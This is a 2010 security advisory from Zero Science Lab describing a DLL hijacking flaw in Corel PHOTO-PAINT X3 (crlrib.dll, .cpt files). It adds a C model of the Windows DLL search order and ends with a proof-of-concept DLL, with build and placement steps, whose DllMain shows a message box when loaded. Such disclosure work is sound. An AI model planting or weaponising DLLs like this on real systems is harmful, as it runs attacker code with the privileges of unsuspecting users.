Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

2010-08-26T00:00:00
ID ZSL-2010-4954
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-08-26T00:00:00

Description

Title: Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4954
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

Graphic design software for striking visual communication.

Description

Corel PHOTO-PAINT X3 suffers from a DLL hijacking vulnerability that lets an attacker execute arbitrary code with the privileges of the user who opens a crafted file. The vulnerable file extension is .cpt; the library the application loads from the document's directory is crlrib.dll, so a malicious crlrib.dll placed next to a .cpt file (locally or on a remote share) is loaded when the file is opened.
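The load order behind this class of bug, as an added example that is not part of the advisory or of Corel's code: a small C model of the Windows DLL search order (the SafeDllSearchMode order that XP SP2 and later use by default, and the legacy order) run over a constructed directory layout in which crlrib.dll exists only beside the opened .cpt file. The directory contents, the DLL names other than crlrib.dll, and the `remove_cwd` flag (standing in for what a call to SetDllDirectory("") or the CWDIllegalInDllSearch registry value from KB2264107 does) are assumptions; the model ignores KnownDLLs and already-loaded modules, which short-circuit the real search.

```c
#include <stdio.h>
#include <string.h>

/* Locations Windows consults, in order, when a DLL is loaded by bare name. */
enum loc { APP_DIR, SYSTEM32, SYSTEM16, WINDOWS_DIR, CWD, PATH_DIRS, NUM_LOCS };

static const char *loc_name[NUM_LOCS] = {
	"application directory", "system32", "16-bit system directory",
	"Windows directory", "current working directory", "PATH directories"
};

/* Writes the search order into `order` and returns its length.
 * safe_mode=1 is the SafeDllSearchMode order (default since XP SP2): the CWD
 * drops from second place to fifth. remove_cwd=1 models a process that called
 * SetDllDirectory("") or a machine with CWDIllegalInDllSearch (KB2264107) set,
 * both of which drop the CWD from the search entirely (assumed here as a flag). */
int dll_search_order(int safe_mode, int remove_cwd, enum loc *order)
{
	static const enum loc safe[]   = { APP_DIR, SYSTEM32, SYSTEM16, WINDOWS_DIR, CWD, PATH_DIRS };
	static const enum loc legacy[] = { APP_DIR, CWD, SYSTEM32, SYSTEM16, WINDOWS_DIR, PATH_DIRS };
	const enum loc *src = safe_mode ? safe : legacy;
	int n = 0;
	for (int i = 0; i < NUM_LOCS; i++) {
		if (remove_cwd && src[i] == CWD)
			continue;
		order[n++] = src[i];
	}
	return n;
}

/* Constructed directory layout: which DLL names each location holds. */
struct dir_contents {
	enum loc where;
	const char *dlls[4];   /* NULL-terminated */
};

/* Returns the location `dll` resolves to under the given search mode,
 * or -1 when no directory in the order contains it (the loader would fail). */
int resolve_dll(const char *dll, const struct dir_contents *fs, int nfs,
                int safe_mode, int remove_cwd)
{
	enum loc order[NUM_LOCS];
	int n = dll_search_order(safe_mode, remove_cwd, order);
	for (int i = 0; i < n; i++)
		for (int d = 0; d < nfs; d++) {
			if (fs[d].where != order[i])
				continue;
			for (int k = 0; fs[d].dlls[k] != NULL; k++)
				if (strcmp(fs[d].dlls[k], dll) == 0)
					return (int)order[i];
		}
	return -1;
}

/* The advisory's scenario: crlrib.dll is absent from Corel's install
 * directory and from the system directories, so the first copy the loader
 * meets is the one sitting next to test.cpt. Explorer sets the CWD to the
 * opened file's directory, which is the attacker's directory. "helper.dll"
 * and "placeholder.dll" are constructed names used only to show the other
 * outcomes. */
static const struct dir_contents scenario[] = {
	{ APP_DIR,  { "placeholder.dll", NULL } },
	{ SYSTEM32, { "helper.dll", NULL } },
	{ CWD,      { "test.cpt", "crlrib.dll", "helper.dll", NULL } },
};
#define NSCEN ((int)(sizeof scenario / sizeof scenario[0]))

static void report(const char *dll, int safe_mode, int remove_cwd)
{
	int r = resolve_dll(dll, scenario, NSCEN, safe_mode, remove_cwd);
	printf("%-12s safe=%d cwd_removed=%d -> %s\n", dll, safe_mode, remove_cwd,
	       r < 0 ? "not found (load fails)" : loc_name[r]);
}

int main(void)
{
	report("crlrib.dll", 1, 0);  /* missing DLL: hijacked even in safe mode */
	report("crlrib.dll", 0, 0);  /* legacy order: hijacked */
	report("crlrib.dll", 1, 1);  /* CWD removed: load fails, no hijack */
	report("helper.dll", 1, 0);  /* present in system32: safe mode wins */
	report("helper.dll", 0, 0);  /* legacy order: CWD copy shadows system32 */
	return 0;
}
```

The point the model makes is that SafeDllSearchMode only protects DLLs that exist somewhere earlier in the order; a DLL the application asks for but does not ship (here crlrib.dll) falls through to the CWD regardless of the mode, which is why the fix is to take the CWD out of the search or to load by full path.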

Vendor

Corel Corporation - <http://www.corel.com>

Affected Version

X3 v13.0.0.576

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

corelpp_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/exploits/14787>
[2] <http://www.packetstormsecurity.org/filedesc/corelpp_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8770>
[4] <http://secunia.com/advisories/41148/>
[5] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[6] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[7] <http://www.securityfocus.com/bid/42753>
[8] <http://osvdb.org/show/osvdb/67582>

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4], [5] and [6]
[13.11.2010] - Added reference [7] and [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

/*

 Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

 Vendor: Corel Corporation
 Product Web Page: http://www.corel.com
 Affected Version: X3 v13.0.0.576

 Summary: Graphic design software for striking visual communication.

 Desc: Corel PHOTO-PAINT X3 suffers from a DLL hijacking vulnerability
 that lets an attacker execute arbitrary code with the privileges of the
 user who opens a crafted file. The vulnerable file extension is .cpt; the
 library loaded from the document's directory is crlrib.dll.

 ----
 gcc -shared -o crlrib.dll corelpp.c

 Compile to crlrib.dll, create an empty file named test.cpt, put both
 files in the same directory and open test.cpt (double-click it).
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

/* Payload: proves the planted DLL was loaded into the target process.
 * Declared before DllMain so the call below is not an implicit declaration. */
static void dll_mll(void)
{
	MessageBoxA(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			/* Runs as soon as the hijacked DLL is mapped into the process. */
			dll_mll();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}

	return TRUE;
}